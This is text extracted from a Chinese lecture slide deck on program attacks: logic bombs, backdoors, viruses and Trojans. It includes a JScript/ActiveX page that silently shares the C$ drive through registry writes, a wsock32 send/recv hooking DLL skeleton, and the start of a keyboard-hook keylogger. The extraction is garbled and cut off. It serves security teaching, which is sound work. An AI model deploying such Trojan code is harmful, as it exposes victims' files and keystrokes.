网络安全6-程序攻击解题.ppt

网络安全;第5章 缓冲区溢出攻击回顾;第6章 程序攻击;第6章 程序攻击; 逻辑炸弹攻击; 逻辑炸弹攻击; 植入后门; 植入后门; 植入后门; 植入后门; 植入后门; 病毒攻击; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击; script language=JScript document.write(APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent /APPLET); function mmain(){ try{ aa=document.applets[0]; aa.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0b}); aa.createInstance(); commandsh=aa.GetObject(); { commandsh.RegWrite(HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion \\Network\\LanMan\\C$\\Flags,302,REG_DWORD); commandsh.RegWrite(HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion \\Network\\LanMan\\C$\\Type,0,REG_DWORD); commandsh.RegWrite(HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion \\Network\\LanMan\\C$\\Path,C:\\);; } } catch(e){} } function start(){setTimeOut(mmain(),1000);} start (); /script body bgcolor = #FFFFFF topmargin=0 leftmargin=0 p你好。。。。。。。/p p全世界最好的网页/p /body /html ; 特洛伊木马攻击;BOOL WINAPI DllMain(HANDLE hInst, ULONG ulReasonForCall, LPVOID lpReserved) { //装载原动态库 if(i==NULL){ i=LoadLibrary(wsock32.dle); }else return 1; if (i!=NULL) { //取得与原同名函数地址 a = GetProcAddress(I,”send”); send1 = (int(_stdcall *)(SOCKET,const char *,int,int))a; a = GetProcAddress(I,”recv”); recv1 = (int(_stdcall *)(SOCKET,const char *,int,int))a; };else return 0; ………………替换原来的所有函数导出，以确保程序运行正常。 } int PASCAL FAR send (SOCKET s,const char *buf,int len,int flags) { ……完成send函数的功能 } int PASCAL FAR recv(SOCKET s,char FAR *buf,int len, int flags) { ……完成recv函数的功能 } ; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击; 特洛伊木马攻击;HHOOK hkb; LRESULT __declspec(dllexport)__stdcall CALLBACK KeyboardProc(int nCode, WPARAM wParam,LPARAM lParam) { char ch; if (((DWORD)lParam 0(HC_ACTION == nCode)) { if((wParam == VK_SPACE)||(wParam==VK_RETURN)|| (wParam = 0x2f)(wParam = 0x100)) { FILE *f1; f1 = fopen(e:\\hook.txt,a+);//打开文件 if(wParam == VK_RETURN) { ch = \n; fwrite(ch, 1, 1, f1);//将键盘按键的字母写入文件 }; e